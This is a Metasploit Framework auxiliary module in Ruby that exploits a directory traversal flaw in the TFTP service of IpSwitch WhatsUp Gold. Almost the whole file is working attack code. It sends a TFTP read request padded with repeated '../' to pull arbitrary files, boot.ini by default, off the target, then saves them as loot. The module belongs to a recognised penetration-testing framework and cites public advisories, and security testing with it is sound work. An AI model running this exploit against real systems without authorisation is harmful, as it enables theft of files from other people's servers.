metasploit-framework/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb

122 lines
2.7 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "IpSwitch WhatsUp Gold TFTP Directory Traversal",
'Description' => %q{
This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp
Gold's TFTP service.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Prabhu S Angadi', #Initial discovery and poc
'sinn3r', #Metasploit
'juan vazquez' #More improvements
],
'References' =>
[
['OSVDB', '77455'],
['BID', '50890'],
['EDB', '18189'],
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
],
'DisclosureDate' => "Dec 12 2011"
))
register_options(
[
Opt::RPORT(69),
OptString.new('FILENAME', [false, 'The file to loot', 'boot.ini']),
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
], self.class)
end
def run_host(ip)
# Prepare the filename
file_name = "../"*10
file_name << datastore['FILENAME']
# Prepare the packet
pkt = "\x00\x01"
pkt << file_name
pkt << "\x00"
pkt << "octet"
pkt << "\x00"
# We need to reuse the same port in order to receive the data
udp_sock = Rex::Socket::Udp.create(
{
'Context' => {'Msf' => framework, 'MsfExploit'=>self}
}
)
add_socket(udp_sock)
# Send the packet to target
file_data = ''
udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)
while (r = udp_sock.recvfrom(65535, 0.1) and r[1])
opcode, block, data = r[0].unpack("nna*") # Parse reply
if opcode != 3 # Check opcode: 3 => Data Packet
print_error("Error retrieving file #{file_name} from #{ip}")
return
end
file_data << data
udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack
end
if file_data.empty?
print_error("Error retrieving file #{file_name} from #{ip}")
return
end
udp_sock.close
# Output file if verbose
vprint_line(file_data.to_s)
# Save file to disk
path = store_loot(
'whatsupgold.tftp',
'application/octet-stream',
ip,
file_data,
datastore['FILENAME']
)
print_status("File saved in: #{path}")
end
#
# Returns an Acknowledgement
#
def tftp_ack(block=1)
pkt = "\x00\x04" # Ack
pkt << [block].pack("n") # Block Id
end
end
=begin
Remote code execution might be unlikely with this directory traversal bug, because WRITE
requests are forbidden by default, and cannot be changed.
=end